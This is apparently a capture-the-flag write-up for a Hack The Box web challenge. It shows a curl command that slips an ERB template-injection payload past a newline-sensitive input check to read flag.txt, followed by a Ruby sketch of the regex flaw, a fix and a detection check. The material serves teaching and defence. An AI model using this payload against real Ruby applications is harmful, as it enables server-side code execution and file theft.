https://app.hackthebox.com/challenges/303

Description

It’s time for a shiny new reveal for the first-ever text neonifier. Come test out our brand new website and make any text glow like a lo-fi neon tube!

Exploitation

curl http://94.237.60.154:35761/ -s -X POST -d 'neon=a%0A%3C%25%3D%20File.open%28%27flag.txt%27%29.read%20%25%3E' | grep -Eo 'HTB{.*}'
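
The request above sends one line of plain text, a newline (%0A), and then an ERB tag in the neon field. The Ruby sketch below is an added example, not the challenge's own code: it assumes the input check is a line-anchored allow-list regex (the hypothetical WEAK pattern), and shows why such a check accepts this body, how whole-string anchors reject it, and how a fixed template keeps user text as data. All constant and method names are illustrative.

```ruby
require 'erb'
require 'uri'

# Constructed input: the form body from the curl command above, URL-decoded.
BODY = 'neon=a%0A%3C%25%3D%20File.open%28%27flag.txt%27%29.read%20%25%3E'
NEON = URI.decode_www_form(BODY).to_h.fetch('neon')

# Assumed validator (hypothetical, not taken from the challenge source).
# In Ruby, ^ and $ anchor at every line, so a single clean line satisfies it.
WEAK = /^[0-9a-z ]+$/i
# \A and \z anchor at the start and end of the whole string.
STRICT = /\A[0-9a-z ]+\z/i

def accepted?(pattern, text)
  pattern.match?(text)
end

# Fixed template: user text is bound as a local and HTML-escaped,
# so it is never parsed as ERB source.
TEMPLATE = ERB.new('<h1 class="glow"><%= ERB::Util.html_escape(text) %></h1>')

def render_safe(text)
  TEMPLATE.result_with_hash(text: text)
end

# Log-side check: ERB delimiters or line breaks in a single-line text field.
def suspicious?(text)
  text.match?(/<%|%>|[\r\n]/)
end

if __FILE__ == $PROGRAM_NAME
  puts "weak check accepts:   #{accepted?(WEAK, NEON)}"
  puts "strict check accepts: #{accepted?(STRICT, NEON)}"
  puts "flagged for review:   #{suspicious?(NEON)}"
  puts render_safe(NEON)
end
```

The anchor fix alone only narrows the input; keeping user text out of the template source is what removes the evaluation path.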

Summary

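Neonify: the broken request handling is in the neon POST parameter. A URL-encoded newline (%0A) followed by an ERB tag proves control over what the server renders, and the same tag reads flag.txt to recover the flag.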